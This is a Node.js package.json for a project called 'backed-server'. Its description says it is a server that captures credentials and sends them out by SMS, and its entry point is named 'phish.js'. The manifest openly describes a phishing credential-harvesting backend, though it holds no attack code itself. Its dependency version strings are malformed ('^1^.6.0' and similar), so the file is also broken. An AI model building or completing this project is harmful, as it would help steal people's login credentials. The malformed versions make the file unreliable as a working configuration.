{
  "name": "backed-server",
  "version": "1.0.0",
  "description": "A server to capture and send credentials via SMS",
  "main": "phish.js",
  "scripts": {
    "start": "node phish.js"
  },
  "dependencies": {
    "axios": "^1^.6.0",
    "express": "^2^.18.2",
    "cors": "^3^.8.5"
  }
}
